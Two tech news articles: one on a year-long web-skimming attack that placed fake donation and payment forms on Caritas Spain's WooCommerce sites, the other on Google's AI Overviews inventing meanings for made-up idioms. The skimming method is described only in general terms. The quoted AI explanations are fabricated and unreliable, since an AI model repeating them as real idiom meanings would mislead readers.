
Image by Boitumelo, from Unsplash
Hackers Target Caritas Charity Sites
- Written by Kiara Fabbri Former Tech News Writer
- Fact-Checked by Sarah Frazier Former Content Manager
A cyberattack hit 17 websites of Caritas Spain, a major Catholic charity, compromising donor card data for more than a year without detection.
In a rush? Here are the quick facts:
- Attackers used fake donation forms to steal donor card data.
- The sites used WooCommerce, a popular WordPress plugin.
- Over 60 fake domains supported the attack’s infrastructure.
The attackers used a method called web skimming, where malicious code is inserted into a website to steal sensitive information from users. In this case, the skimmer created a fake donation form that mimicked the real one and silently captured personal and payment data including names, addresses, card numbers, CVV, and more.
“This campaign reinforces a broader trend that has been observed: web skimming infections are increasingly driven by modular kits,” researchers at Jscrambler who flagged the hack wrote . These kits allow hackers to easily mix different tools and channels to deliver and collect stolen data.
The researchers say that the infected websites were all powered by WooCommerce, a popular plugin for online payments on WordPress. The attack had two parts: first, a tiny piece of hidden code was injected into the site’s homepage to contact the hackers’ server.
Then, the second-stage script added a fake “Continue” button over the real one. Once users clicked it, they were shown a counterfeit online payment form, designed to look like the official gateway from Santander bank.
After capturing the data, the form briefly showed a loading spinner before redirecting the donor to the legitimate payment site, making the scam harder to notice.
“It’s especially concerning given the target,” Jscrambler noted. “Caritas is a non-profit dedicated to helping vulnerable communities. Still, attackers were happy to keep their skimming operation going […] for over a year.”
The infection was first discovered on March 16, 2025, and the affected websites were eventually taken offline for maintenance in early April after Jscrambler reached out.
By April 11, the malicious code was finally removed. However, the hackers had shifted tactics in the meantime, altering the script to avoid detection.
Researchers also found signs that this group targeted other websites too, using over 60 fake domains to distribute and collect data. Many of these were hosted under the same IP, pointing to a centralized setup. Jscrambler reports that Caritas has not released an official statement about the breach.

Photo by Mitchell Luo on Unsplash
Google’s AI Overviews Goes Viral Again For Hallucinating Fake Idiom Meanings
- Written by Andrea Miliani Former Tech News Expert
- Fact-Checked by Sarah Frazier Former Content Manager
Social media users noticed that Google’s AI Overviews feature provides explanations and definitions for fake idioms when they include the word “meaning” after a random phrase. Many of these AI-generated responses have gone viral, sparking laughter among social media users.
In a rush? Here are the quick facts:
- Users on social media noticed Google’s AI Overviews makes up explanations for fake idioms.
- Multiple users on Threads, X, and Bluesky have reported similar hallucinations of absurd, made-up sayings.
- It’s not the first time AI Overviews goes viral for providing incorrect information.
This isn’t the first time AI Overviews has earned an embarrassing reputation. Last year, Google Search’s AI tool went viral for delivering incorrect answers —some of which were based on outdated Reddit posts—undermining the model’s credibility, reliability, and accuracy.
This time, the AI model has given users “serious” responses to made-up sayings. According to Mashable , this need from AI models to provide an answer even when they do not have the answer or enough information to provide a correct response is now known as “AI-splaining.”
Spit out my coffee. I call this “AI-splaining” pic.twitter.com/K9tLIwoCqC — Lily Ray 😏 (@lilyraynyc) April 20, 2025
Many users shared on social media a few examples of the current situation with AI Overviews. “Someone on Threads noticed you can type any random sentence into Google, then add ‘meaning’ afterwards, and you’ll get an AI explanation of a famous idiom or phrase you just made up,” wrote a Bluesky user who included screenshots of his test.
He wrote “you can’t lick a badger twice,” followed by the word “meaning”, and the AI model provided an explanation for the fake idiom: “It means you can trick or deceive someone a second time after they’ve been tricked once.” AI Overviews proceeded to provide a more detailed explanation, breaking it down word by word.
“The replies to this thread are very funny, but it’s a warning sign that one of the key functions of Googling – the ability to factcheck a quote, verify a source, or track down something half remembered – will get so much harder if AI prefers to legitimate statistical possibilities over actual truth,” added the user.
A reporter from Yahoo! Tech confirmed the hallucination by writing fake Pokémon idioms such as “Never let your horse play Pokémon” and the AI model replied with a complete made-up explanation: “Is a humorous, lighthearted warning against allowing a horse, which is a large animal with a strong will, to engage in activities, like playing video games or the Pokémon card game, that are typically considered human activities.”
Google AI Overviews has been expanding to more countries and regions in the past few months, and has recently reached over 1.5 billion users per month.